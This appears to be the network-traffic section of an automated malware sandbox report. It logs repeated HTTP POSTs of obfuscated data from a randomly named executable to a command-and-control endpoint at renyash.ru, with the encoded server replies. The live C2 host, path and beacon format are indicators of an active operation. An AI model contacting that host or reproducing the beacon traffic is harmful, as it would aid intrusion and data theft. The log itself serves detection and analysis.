                                                                                                                          Dec 26, 2024 22:32:59.992500067 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:57 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.44977237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:00.322792053 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:00.680870056 CET2596OUTData Raw: 52 53 5d 5f 5b 5b 56 5d 5d 58 52 5a 56 59 54 57 5f 52 58 40 59 54 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RS]_[[V]]XRZVYTW_RX@YTQ_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8?),=)_<2"<0%[1*:&>31(!?? ].#[(2
                                                                                                                          Dec 26, 2024 22:33:01.774118900 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:02.023785114 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:59 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.44977537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:02.272056103 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:02.617747068 CET2596OUTData Raw: 57 55 5d 59 5b 50 56 5f 5d 58 52 5a 56 5c 54 5b 5f 53 58 47 59 5f 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WU]Y[PV_]XRZV\T[_SXGY_Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#]./>)<>!(,!"?$&=.):*'3%[3!<41)/ ].#[(&
                                                                                                                          Dec 26, 2024 22:33:03.640214920 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:03.892117977 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:01 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.44978037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:04.243697882 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:04.604576111 CET2596OUTData Raw: 52 53 58 5f 5b 51 56 5f 5d 58 52 5a 56 59 54 54 5f 5b 58 45 59 58 51 53 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RSX_[QV_]XRZVYTT_[XEYXQSPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#X8?[>,;X>S%(X7?_'=]*\9\&#)['?!<$"+? ].#[(2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.44978637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:04.919111967 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:05.274000883 CET1924OUTData Raw: 57 51 5d 59 5b 50 56 58 5d 58 52 5a 56 5c 54 52 5f 58 58 46 59 5c 51 59 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WQ]Y[PVX]XRZV\TR_XXFY\QYPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /2Z=<=&"?<*#,71=:\=)% X'.<:Y? ].#[(&
                                                                                                                          Dec 26, 2024 22:33:06.282514095 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:06.536233902 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 59 31 13 20 58 21 2f 2c 13 28 39 03 08 35 3f 32 0a 30 29 0e 01 3f 5a 26 59 3f 20 22 51 25 29 31 09 21 11 20 53 3f 57 3b 59 3e 0c 2b 59 01 1d 23 19 27 3b 02 5c 30 3a 22 05 39 2f 01 42 2a 36 26 5d 29 2a 2f 53 3e 3b 21 11 23 1f 39 0d 3f 00 2a 13 2d 3f 25 18 2a 20 31 51 33 07 2c 51 02 11 3b 0f 23 22 21 54 20 3f 38 57 3d 33 24 03 35 14 30 53 25 13 36 0c 26 3c 0f 01 26 3c 35 05 30 24 30 1f 26 3b 00 41 26 32 24 1c 26 15 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: 'Y1 X!/,(95?20)?Z&Y? "Q%)1! S?W;Y>+Y#';\0:"9/B*6&])*/S>;!#9?*-?%* 1Q3,Q;#"!T ?8W=3$50S%6&<&<50$0&;A&2$& ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.44978737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:05.045367956 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:05.399023056 CET2596OUTData Raw: 57 50 58 58 5b 51 56 5e 5d 58 52 5a 56 54 54 54 5f 5f 58 46 59 59 51 53 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WPXX[QV^]XRZVTTT__XFYYQSPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#^82]*#_=%"+?"7,1!**"20??2< ].#[(
                                                                                                                          Dec 26, 2024 22:33:06.409409046 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:06.660068035 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.44978937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:06.907618999 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:07.258295059 CET2596OUTData Raw: 57 57 58 5e 5b 5c 56 50 5d 58 52 5a 56 54 54 56 5f 5f 58 43 59 5e 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WWX^[\VP]XRZVTTV__XCY^Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;/._=/4?5.<,-#]%[!(9=%35]$<!(.\)? ].#[(
                                                                                                                          Dec 26, 2024 22:33:08.269695044 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:08.520179033 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:06 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.44979437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:09.406961918 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:09.758739948 CET2596OUTData Raw: 57 57 5d 59 5e 5f 56 50 5d 58 52 5a 56 54 54 53 5f 58 58 49 59 5e 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WW]Y^_VP]XRZVTTS_XXIY^Q_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8=)?4>&%+Z-"<?_1>&Z):2 Z&?X<72( ].#[(
                                                                                                                          Dec 26, 2024 22:33:10.772070885 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:11.028211117 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.44980037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:11.268089056 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.44980137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:11.665016890 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:12.023983002 CET1924OUTData Raw: 57 52 5d 5b 5e 5d 56 58 5d 58 52 5a 56 5a 54 55 5f 5c 58 48 59 5a 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WR][^]VX]XRZVZTU_\XHYZQXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ .?>=Z+*%)+,-X7,#^%.-**5%)$.[?&[)/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:13.026992083 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:13.280186892 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:10 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 01 31 3e 33 01 37 12 2c 5f 28 3a 3e 53 36 2c 2e 42 33 00 2f 5a 29 3c 08 10 28 0d 2d 09 33 39 2d 44 23 3f 2c 57 3c 21 23 5c 29 1c 2b 59 01 1d 20 02 27 3b 27 01 24 14 2e 05 3a 01 2f 09 3e 18 31 03 3d 3a 2c 0a 3e 3b 3a 04 20 1f 07 0c 2b 00 32 5b 3a 05 21 1c 3c 0e 25 53 33 07 2c 51 02 11 3b 0d 35 0c 31 57 21 01 28 56 28 20 28 07 22 3a 3f 0f 24 3d 3d 52 30 3c 25 00 33 3f 2a 5c 27 24 28 1f 26 2b 3e 40 25 22 0e 1f 32 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $1>37,_(:>S6,.B3/Z)<(-39-D#?,W<!#\)+Y ';'$.:/>1=:,>;: +2[:!<%S3,Q;51W!(V( (":?$==R0<%3?*\'$(&+>@%"2? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.44980237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:11.924135923 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:12.275412083 CET2596OUTData Raw: 52 57 5d 54 5b 5e 56 5f 5d 58 52 5a 56 54 54 5a 5f 5a 58 49 59 54 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RW]T[^V_]XRZVTTZ_ZXIYTQZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#\/?.Z*<8>%[+"#_1>"Y*&3"3/1<-(/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:13.287386894 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:13.695322990 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:11 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.44980837.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:13.938957930 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:14.291220903 CET2596OUTData Raw: 52 53 58 59 5b 51 53 5a 5d 58 52 5a 56 54 54 50 5f 5b 58 47 59 54 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RSXY[QSZ]XRZVTTP_[XGYTQ]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#\;/9*?;_)")<#,#%=5Z1&<9?'(/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:15.298512936 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:15.551964998 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:13 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.44981437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:15.800421953 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:16.148948908 CET2596OUTData Raw: 52 54 5d 54 5e 5f 56 5d 5d 58 52 5a 56 54 54 57 5f 5e 58 41 59 58 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RT]T^_V]]XRZVTTW_^XAYXQZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#;>=<*=\(<7,#%%*:&=X$?:Z($"</ ].#[(
                                                                                                                          Dec 26, 2024 22:33:17.163587093 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:17.416250944 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:15 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.44982037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:17.695463896 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:18.041296959 CET2596OUTData Raw: 57 57 58 5f 5e 5a 53 5a 5d 58 52 5a 56 5c 54 56 5f 5a 58 46 59 5d 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WWX_^ZSZ]XRZV\TV_ZXFY]Q]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#8?2>?+_=&=\+/=Z7?82=[=9:&0%0?%=$"](/ ].#[(&


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.44982137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
